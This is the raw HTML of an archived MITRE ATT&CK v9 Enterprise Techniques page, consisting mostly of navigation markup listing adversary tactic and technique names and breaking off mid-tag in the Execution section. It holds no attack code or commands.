CINXE.COM

Techniques - Enterprise | MITRE ATT&CK®

<!DOCTYPE html> <html lang='en'> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-62667723-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-62667723-1'); </script> <meta name="google-site-verification" content="2oJKLqNN62z6AOCb0A0IXGtbQuj-lev5YPAHFF_cbHQ"/> <meta charset='utf-8'> <meta name='viewport' content='width=device-width, initial-scale=1, shrink-to-fit=no'> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <link rel='shortcut icon' href="/versions/v9/theme/favicon.ico" type='image/x-icon'> <title>Techniques - Enterprise | MITRE ATT&CK&reg;</title> <!-- Bootstrap CSS --> <link rel='stylesheet' href="/versions/v9/theme/style/bootstrap.min.css" /> <link rel='stylesheet' href="/versions/v9/theme/style/bootstrap-glyphicon.min.css" /> <link rel='stylesheet' href="/versions/v9/theme/style/bootstrap-tourist.css" /> <link rel="stylesheet" type="text/css" href="/versions/v9/theme/style.min.css?426cc53a"> </head> <body> <!--stopindex--> <header> <nav class='navbar navbar-expand-lg navbar-dark fixed-top'> <a class='navbar-brand' href="/versions/v9/"><img src="/versions/v9/theme/images/mitre_attack_logo.png" class="attack-logo"></a> <button class='navbar-toggler' type='button' data-toggle='collapse' data-target='#navbarCollapse' aria-controls='navbarCollapse' aria-expanded='false' aria-label='Toggle navigation'> <span class='navbar-toggler-icon'></span> </button> <div class='collapse navbar-collapse' id='navbarCollapse'> <ul class='nav nav-tabs ml-auto'> <li class="nav-item"> <a href="/versions/v9/matrices/" class="nav-link" ><b>Matrices</b></a> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="/versions/v9/tactics/" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <b>Tactics</b> </a> <div class="dropdown-menu " aria-labelledby="navbarDropdown"> <a class="dropdown-item" href="/versions/v9/tactics/enterprise/">Enterprise</a> <a class="dropdown-item" href="/versions/v9/tactics/mobile/">Mobile</a> </div> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="/versions/v9/techniques/" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <b>Techniques</b> </a> <div class="dropdown-menu " aria-labelledby="navbarDropdown"> <a class="dropdown-item" href="/versions/v9/techniques/enterprise/">Enterprise</a> <a class="dropdown-item" href="/versions/v9/techniques/mobile/">Mobile</a> </div> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="/versions/v9/mitigations/" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <b>Mitigations</b> </a> <div class="dropdown-menu " aria-labelledby="navbarDropdown"> <a class="dropdown-item" href="/versions/v9/mitigations/enterprise/">Enterprise</a> <a class="dropdown-item" href="/versions/v9/mitigations/mobile/">Mobile</a> </div> </li> <li class="nav-item"> <a href="/versions/v9/groups" class="nav-link" ><b>Groups</b></a> </li> <li class="nav-item"> <a href="/versions/v9/software/" class="nav-link" ><b>Software</b></a> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="/versions/v9/resources/" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <b>Resources</b> </a> <div class="dropdown-menu " aria-labelledby="navbarDropdown"> <a class="dropdown-item" href="/versions/v9/resources/">General Information</a> <a class="dropdown-item" href="/versions/v9/resources/getting-started/">Getting Started</a> <a class="dropdown-item" href="/versions/v9/resources/training/">Training</a> <a class="dropdown-item" href="/versions/v9/resources/attackcon/">ATT&CKcon</a> <a class="dropdown-item" href="/versions/v9/resources/working-with-attack/">Working with ATT&CK</a> <a class="dropdown-item" href="/versions/v9/resources/faq/">FAQ</a> <a class="dropdown-item" href="/resources/updates/">Updates</a> <a class="dropdown-item" href="/resources/versions/">Versions of ATT&CK</a> <a class="dropdown-item" href="/versions/v9/resources/related-projects/">Related Projects</a> </div> </li> <li class="nav-item"> <a href="https://medium.com/mitre-attack/" target="_blank" class="nav-link"> <b>Blog</b>&nbsp; <img src="/versions/v9/theme/images/external-site.svg" alt="External site" class="external-icon" /> </a> </li> <li class="nav-item"> <a href="/versions/v9/resources/contribute/" class="nav-link" ><b>Contribute</b></a> </li> <li class="nav-item"> <button id="search-button" class="btn search-button">Search <div class="search-icon"></div></button> </li> </ul> </div> </nav> </header> <!-- don't edit or remove the line below even though it's commented out, it gets parsed and replaced by the versioning feature --> <div class="container-fluid version-banner"><div class="icon-inline baseline mr-1"><img src="/versions/v9/theme/images/icon-warning-24px.svg"></div>Currently viewing <a href="https://github.com/mitre/cti/releases/tag/ATT%26CK-v9.0" target="_blank">ATT&CK v9.0</a> which was live between April 29, 2021 and October 20, 2021. <a href="/resources/versions/">Learn more about the versioning system</a> or <a href="/">see the live site</a>.</div> <div id='content' class="maincontent"> <!--start-indexing-for-search--> <div class='container-fluid h-100'> <div class='row h-100'> <div class="nav flex-column col-xl-2 col-lg-3 col-md-3 sidebar nav pt-5 pb-3 pl-3 border-right" id="v-tab" role="tablist" aria-orientation="vertical"> <!--stop-indexing-for-search--> <div id="v-tab" role="tablist" aria-orientation="vertical"> <span class="heading" id="v-home-tab" aria-selected="false">TECHNIQUES</span> <div class="sidenav"> <div class="sidenav-head active" id="enterprise"> <a href="/versions/v9/techniques/enterprise/"> Enterprise </a> <div class="expand-button collapsed" id="enterprise-header" data-toggle="collapse" data-target="#enterprise-body" aria-expanded="false" aria-controls="#enterprise-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-body" aria-labelledby="enterprise-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043"> <a href="/versions/v9/tactics/TA0043"> Reconnaissance </a> <div class="expand-button collapsed" id="enterprise-TA0043-header" data-toggle="collapse" data-target="#enterprise-TA0043-body" aria-expanded="false" aria-controls="#enterprise-TA0043-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-body" aria-labelledby="enterprise-TA0043-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1595"> <a href="/versions/v9/techniques/T1595/"> Active Scanning </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1595-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1595-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1595-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1595-body" aria-labelledby="enterprise-TA0043-T1595-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1595-T1595.001"> <a href="/versions/v9/techniques/T1595/001/"> Scanning IP Blocks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1595-T1595.002"> <a href="/versions/v9/techniques/T1595/002/"> Vulnerability Scanning </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1592"> <a href="/versions/v9/techniques/T1592/"> Gather Victim Host Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1592-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1592-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1592-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1592-body" aria-labelledby="enterprise-TA0043-T1592-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1592-T1592.001"> <a href="/versions/v9/techniques/T1592/001/"> Hardware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1592-T1592.002"> <a href="/versions/v9/techniques/T1592/002/"> Software </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1592-T1592.003"> <a href="/versions/v9/techniques/T1592/003/"> Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1592-T1592.004"> <a href="/versions/v9/techniques/T1592/004/"> Client Configurations </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1589"> <a href="/versions/v9/techniques/T1589/"> Gather Victim Identity Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1589-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1589-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1589-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1589-body" aria-labelledby="enterprise-TA0043-T1589-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1589-T1589.001"> <a href="/versions/v9/techniques/T1589/001/"> Credentials </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1589-T1589.002"> <a href="/versions/v9/techniques/T1589/002/"> Email Addresses </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1589-T1589.003"> <a href="/versions/v9/techniques/T1589/003/"> Employee Names </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1590"> <a href="/versions/v9/techniques/T1590/"> Gather Victim Network Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1590-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1590-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1590-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1590-body" aria-labelledby="enterprise-TA0043-T1590-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.001"> <a href="/versions/v9/techniques/T1590/001/"> Domain Properties </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.002"> <a href="/versions/v9/techniques/T1590/002/"> DNS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.003"> <a href="/versions/v9/techniques/T1590/003/"> Network Trust Dependencies </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.004"> <a href="/versions/v9/techniques/T1590/004/"> Network Topology </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.005"> <a href="/versions/v9/techniques/T1590/005/"> IP Addresses </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1590-T1590.006"> <a href="/versions/v9/techniques/T1590/006/"> Network Security Appliances </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1591"> <a href="/versions/v9/techniques/T1591/"> Gather Victim Org Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1591-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1591-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1591-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1591-body" aria-labelledby="enterprise-TA0043-T1591-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1591-T1591.001"> <a href="/versions/v9/techniques/T1591/001/"> Determine Physical Locations </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1591-T1591.002"> <a href="/versions/v9/techniques/T1591/002/"> Business Relationships </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1591-T1591.003"> <a href="/versions/v9/techniques/T1591/003/"> Identify Business Tempo </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1591-T1591.004"> <a href="/versions/v9/techniques/T1591/004/"> Identify Roles </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1598"> <a href="/versions/v9/techniques/T1598/"> Phishing for Information </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1598-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1598-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1598-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1598-body" aria-labelledby="enterprise-TA0043-T1598-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1598-T1598.001"> <a href="/versions/v9/techniques/T1598/001/"> Spearphishing Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1598-T1598.002"> <a href="/versions/v9/techniques/T1598/002/"> Spearphishing Attachment </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1598-T1598.003"> <a href="/versions/v9/techniques/T1598/003/"> Spearphishing Link </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1597"> <a href="/versions/v9/techniques/T1597/"> Search Closed Sources </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1597-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1597-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1597-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1597-body" aria-labelledby="enterprise-TA0043-T1597-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1597-T1597.001"> <a href="/versions/v9/techniques/T1597/001/"> Threat Intel Vendors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1597-T1597.002"> <a href="/versions/v9/techniques/T1597/002/"> Purchase Technical Data </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1596"> <a href="/versions/v9/techniques/T1596/"> Search Open Technical Databases </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1596-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1596-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1596-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1596-body" aria-labelledby="enterprise-TA0043-T1596-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1596-T1596.001"> <a href="/versions/v9/techniques/T1596/001/"> DNS/Passive DNS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1596-T1596.002"> <a href="/versions/v9/techniques/T1596/002/"> WHOIS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1596-T1596.003"> <a href="/versions/v9/techniques/T1596/003/"> Digital Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1596-T1596.004"> <a href="/versions/v9/techniques/T1596/004/"> CDNs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1596-T1596.005"> <a href="/versions/v9/techniques/T1596/005/"> Scan Databases </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0043-T1593"> <a href="/versions/v9/techniques/T1593/"> Search Open Websites/Domains </a> <div class="expand-button collapsed" id="enterprise-TA0043-T1593-header" data-toggle="collapse" data-target="#enterprise-TA0043-T1593-body" aria-expanded="false" aria-controls="#enterprise-TA0043-T1593-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0043-T1593-body" aria-labelledby="enterprise-TA0043-T1593-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1593-T1593.001"> <a href="/versions/v9/techniques/T1593/001/"> Social Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1593-T1593.002"> <a href="/versions/v9/techniques/T1593/002/"> Search Engines </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0043-T1594"> <a href="/versions/v9/techniques/T1594/"> Search Victim-Owned Websites </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042"> <a href="/versions/v9/tactics/TA0042"> Resource Development </a> <div class="expand-button collapsed" id="enterprise-TA0042-header" data-toggle="collapse" data-target="#enterprise-TA0042-body" aria-expanded="false" aria-controls="#enterprise-TA0042-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-body" aria-labelledby="enterprise-TA0042-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1583"> <a href="/versions/v9/techniques/T1583/"> Acquire Infrastructure </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1583-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1583-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1583-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1583-body" aria-labelledby="enterprise-TA0042-T1583-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.001"> <a href="/versions/v9/techniques/T1583/001/"> Domains </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.002"> <a href="/versions/v9/techniques/T1583/002/"> DNS Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.003"> <a href="/versions/v9/techniques/T1583/003/"> Virtual Private Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.004"> <a href="/versions/v9/techniques/T1583/004/"> Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.005"> <a href="/versions/v9/techniques/T1583/005/"> Botnet </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1583-T1583.006"> <a href="/versions/v9/techniques/T1583/006/"> Web Services </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1586"> <a href="/versions/v9/techniques/T1586/"> Compromise Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1586-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1586-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1586-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1586-body" aria-labelledby="enterprise-TA0042-T1586-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1586-T1586.001"> <a href="/versions/v9/techniques/T1586/001/"> Social Media Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1586-T1586.002"> <a href="/versions/v9/techniques/T1586/002/"> Email Accounts </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1584"> <a href="/versions/v9/techniques/T1584/"> Compromise Infrastructure </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1584-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1584-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1584-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1584-body" aria-labelledby="enterprise-TA0042-T1584-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.001"> <a href="/versions/v9/techniques/T1584/001/"> Domains </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.002"> <a href="/versions/v9/techniques/T1584/002/"> DNS Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.003"> <a href="/versions/v9/techniques/T1584/003/"> Virtual Private Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.004"> <a href="/versions/v9/techniques/T1584/004/"> Server </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.005"> <a href="/versions/v9/techniques/T1584/005/"> Botnet </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1584-T1584.006"> <a href="/versions/v9/techniques/T1584/006/"> Web Services </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1587"> <a href="/versions/v9/techniques/T1587/"> Develop Capabilities </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1587-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1587-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1587-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1587-body" aria-labelledby="enterprise-TA0042-T1587-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1587-T1587.001"> <a href="/versions/v9/techniques/T1587/001/"> Malware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1587-T1587.002"> <a href="/versions/v9/techniques/T1587/002/"> Code Signing Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1587-T1587.003"> <a href="/versions/v9/techniques/T1587/003/"> Digital Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1587-T1587.004"> <a href="/versions/v9/techniques/T1587/004/"> Exploits </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1585"> <a href="/versions/v9/techniques/T1585/"> Establish Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1585-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1585-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1585-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1585-body" aria-labelledby="enterprise-TA0042-T1585-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1585-T1585.001"> <a href="/versions/v9/techniques/T1585/001/"> Social Media Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1585-T1585.002"> <a href="/versions/v9/techniques/T1585/002/"> Email Accounts </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1588"> <a href="/versions/v9/techniques/T1588/"> Obtain Capabilities </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1588-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1588-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1588-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1588-body" aria-labelledby="enterprise-TA0042-T1588-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.001"> <a href="/versions/v9/techniques/T1588/001/"> Malware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.002"> <a href="/versions/v9/techniques/T1588/002/"> Tool </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.003"> <a href="/versions/v9/techniques/T1588/003/"> Code Signing Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.004"> <a href="/versions/v9/techniques/T1588/004/"> Digital Certificates </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.005"> <a href="/versions/v9/techniques/T1588/005/"> Exploits </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1588-T1588.006"> <a href="/versions/v9/techniques/T1588/006/"> Vulnerabilities </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0042-T1608"> <a href="/versions/v9/techniques/T1608/"> Stage Capabilities </a> <div class="expand-button collapsed" id="enterprise-TA0042-T1608-header" data-toggle="collapse" data-target="#enterprise-TA0042-T1608-body" aria-expanded="false" aria-controls="#enterprise-TA0042-T1608-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0042-T1608-body" aria-labelledby="enterprise-TA0042-T1608-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.001"> <a href="/versions/v9/techniques/T1608/001/"> Upload Malware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.002"> <a href="/versions/v9/techniques/T1608/002/"> Upload Tool </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.003"> <a href="/versions/v9/techniques/T1608/003/"> Install Digital Certificate </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.004"> <a href="/versions/v9/techniques/T1608/004/"> Drive-by Target </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0042-T1608-T1608.005"> <a href="/versions/v9/techniques/T1608/005/"> Link Target </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0001"> <a href="/versions/v9/tactics/TA0001"> Initial Access </a> <div class="expand-button collapsed" id="enterprise-TA0001-header" data-toggle="collapse" data-target="#enterprise-TA0001-body" aria-expanded="false" aria-controls="#enterprise-TA0001-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0001-body" aria-labelledby="enterprise-TA0001-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1189"> <a href="/versions/v9/techniques/T1189/"> Drive-by Compromise </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1190"> <a href="/versions/v9/techniques/T1190/"> Exploit Public-Facing Application </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1133"> <a href="/versions/v9/techniques/T1133/"> External Remote Services </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1200"> <a href="/versions/v9/techniques/T1200/"> Hardware Additions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0001-T1566"> <a href="/versions/v9/techniques/T1566/"> Phishing </a> <div class="expand-button collapsed" id="enterprise-TA0001-T1566-header" data-toggle="collapse" data-target="#enterprise-TA0001-T1566-body" aria-expanded="false" aria-controls="#enterprise-TA0001-T1566-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0001-T1566-body" aria-labelledby="enterprise-TA0001-T1566-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1566-T1566.001"> <a href="/versions/v9/techniques/T1566/001/"> Spearphishing Attachment </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1566-T1566.002"> <a href="/versions/v9/techniques/T1566/002/"> Spearphishing Link </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1566-T1566.003"> <a href="/versions/v9/techniques/T1566/003/"> Spearphishing via Service </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1091"> <a href="/versions/v9/techniques/T1091/"> Replication Through Removable Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0001-T1195"> <a href="/versions/v9/techniques/T1195/"> Supply Chain Compromise </a> <div class="expand-button collapsed" id="enterprise-TA0001-T1195-header" data-toggle="collapse" data-target="#enterprise-TA0001-T1195-body" aria-expanded="false" aria-controls="#enterprise-TA0001-T1195-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0001-T1195-body" aria-labelledby="enterprise-TA0001-T1195-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1195-T1195.001"> <a href="/versions/v9/techniques/T1195/001/"> Compromise Software Dependencies and Development Tools </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1195-T1195.002"> <a href="/versions/v9/techniques/T1195/002/"> Compromise Software Supply Chain </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1195-T1195.003"> <a href="/versions/v9/techniques/T1195/003/"> Compromise Hardware Supply Chain </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1199"> <a href="/versions/v9/techniques/T1199/"> Trusted Relationship </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0001-T1078"> <a href="/versions/v9/techniques/T1078/"> Valid Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0001-T1078-header" data-toggle="collapse" data-target="#enterprise-TA0001-T1078-body" aria-expanded="false" aria-controls="#enterprise-TA0001-T1078-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0001-T1078-body" aria-labelledby="enterprise-TA0001-T1078-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1078-T1078.001"> <a href="/versions/v9/techniques/T1078/001/"> Default Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1078-T1078.002"> <a href="/versions/v9/techniques/T1078/002/"> Domain Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1078-T1078.003"> <a href="/versions/v9/techniques/T1078/003/"> Local Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0001-T1078-T1078.004"> <a href="/versions/v9/techniques/T1078/004/"> Cloud Accounts </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002"> <a href="/versions/v9/tactics/TA0002"> Execution </a> <div class="expand-button collapsed" id="enterprise-TA0002-header" data-toggle="collapse" data-target="#enterprise-TA0002-body" aria-expanded="false" aria-controls="#enterprise-TA0002-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-body" aria-labelledby="enterprise-TA0002-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1059"> <a href="/versions/v9/techniques/T1059/"> Command and Scripting Interpreter </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1059-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1059-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1059-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1059-body" aria-labelledby="enterprise-TA0002-T1059-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.001"> <a href="/versions/v9/techniques/T1059/001/"> PowerShell </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.002"> <a href="/versions/v9/techniques/T1059/002/"> AppleScript </a> </div> </div> <div class="sidenav"> <div 